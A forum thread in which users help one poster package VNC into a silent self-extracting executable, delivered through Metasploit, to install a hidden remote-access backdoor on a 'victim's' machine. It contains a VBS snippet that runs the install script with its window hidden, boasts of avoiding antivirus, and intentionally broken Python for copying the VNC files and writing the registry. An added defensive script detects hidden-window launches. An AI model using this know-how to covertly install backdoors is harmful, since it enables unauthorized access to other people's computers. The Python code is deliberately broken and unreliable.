Self Extract then Execute HELP!


Deathray

Hi people. I would be so grateful for help with my situation.

I have 4 files.

install.bat

VNCHOOKS.DLL

WINVNC.EXE

VNC.REG

Is there any way to combine these 4 files into a single, self extracting .exe file which executes install.bat silently?

The reason is that I am using the windows/upexec payload in Metasploit and want to install VNC as a service silently when executed, for future backdoor use.


I think a WinRAR SFX archive might be what you're looking for.

It will compress and make all your files to a single executable which can run a file after the extraction.


Oh .. my... god! EXACTLY what I was looking for...

1 last problem - when the batch file gets executed the cmd.exe window pops up - any way to hide that? Thanks in advance!! :):)


Never mind I found a quick solution :)

Instead of 4 files I have 5 files. A new one called install.vbs

It contains this:

Set WshShell = CreateObject("WScript.Shell")

cmds=WshShell.RUN(".\install.bat", 0, True)

Set WshShell = Nothing

Now the batch file is completely invisible haha this is so cool :D Thank you soooo much for your help :)

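From a defender's point of view, the hidden-window launch in install.vbs above is visible statically: the second argument of WshShell.Run is the window style, and 0 means hidden. The following triage sketch is an added example, not code from the thread; the function names and the sample script are constructed for illustration, and only a literal 0 style is recognised.

```python
import re

# WshShell.Run(strCommand, [intWindowStyle], [bWaitOnReturn]); style 0 hides the window.
RUN_CALL = re.compile(
    r'\.run\s*\(?\s*"((?:[^"]|"")*)"'   # command string (VBScript escapes " as "")
    r'(?:\s*,\s*([^,\r\n)]*))?',         # optional intWindowStyle argument
    re.IGNORECASE,
)
LAUNCHABLE = re.compile(r'\.(bat|cmd|exe|ps1|vbs|js)\b', re.IGNORECASE)

# Constructed sample: the thread's install.vbs plus a commented-out and a visible call.
SAMPLE_VBS = r'''Set WshShell = CreateObject("WScript.Shell")
' WshShell.Run "old.bat", 0
WshShell.Run "notepad.exe", 1, False
cmds=WshShell.RUN(".\install.bat", 0, True)
Set WshShell = Nothing
'''

def strip_comments(line):
    """Drop VBScript comments (' or Rem) that sit outside string literals."""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            return line[:i]
    return "" if re.match(r'\s*rem\b', line, re.IGNORECASE) else line

def find_hidden_runs(vbs_text):
    """Return (line_no, command, reason) for each Run call that hides its window."""
    findings = []
    for no, raw in enumerate(vbs_text.splitlines(), 1):
        m = RUN_CALL.search(strip_comments(raw))
        if not m:
            continue
        command = m.group(1).replace('""', '"')
        style = (m.group(2) or "").strip()
        if style == "0":  # literal hidden style only; variables are not resolved
            reason = "hidden window"
            if LAUNCHABLE.search(command):
                reason += ", launches script or binary"
            findings.append((no, command, reason))
    return findings

if __name__ == "__main__":
    for finding in find_hidden_runs(SAMPLE_VBS):
        print(finding)
```

A hit is a triage signal rather than a verdict, since administrators also use hidden-window launches in legitimate logon and maintenance scripts.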

Nice try USBHACKER! lol no but you can do all of that in less than 20 lines of python and still hide the cmd window. You have too many files running, it's just too sloppy.

lol yeah I did steal the batch + vnc from gonzors payload :D ... But I thought it was great because it installs itself as a service and no AntiVirus detects it as a virus plus Windows Firewall doesn't seem to care about VNC binding to a port :)

Yeah probably - but that would require me learning python first AND the victim would have to have python installed on his computer, which is not realistic and I want my lab to be realistic :).

Thanks Zimmer for the link. Hope you didn't use any more time than I would have if I looked for it by myself.


Wouldn't that be more sloppy as it would require the executable file to contain the entire python runtime?

Nope, as a matter of fact I am making an exe to do all this atm. I will post the link to it later.

Source:

VNC.exe

import os,
from ConfigParser import ConfigParser
config.read('vnc.cfg')
newpath = config.get('Move To', 'Location')
vncauth =  config.get('VNC Auth', 'Password')
if not os.path.isdir(newpath):
srcname = "winvnc.exe"
srcname = "hooks.dll"
shutil.copy(srcname, newpath)
shutil.copy(srcname1, newpath)
f = open("VNC.reg", 'r')
f.write('Windows Registry Editor Version 5.00\n[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC][HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4]\n')
f.write(vncauth)
f.write('REG SHIT')
f.close()
reg=os.popen3('VNC.reg','b')
runvnc=os.popen3(newpath + 'winvnc4.exe','b')

VNC.cfg

[Move To]
Location: C:\VNC
[VNC Auth]
Password: “Password”=hex:HEX COMMA SEPARATED PASS

Ask for permission to edit the registry but you get the idea. Less than 1MB and you can do pretty much what you want with it. Code is sloppy, missing shit and doesn't work on purpose.
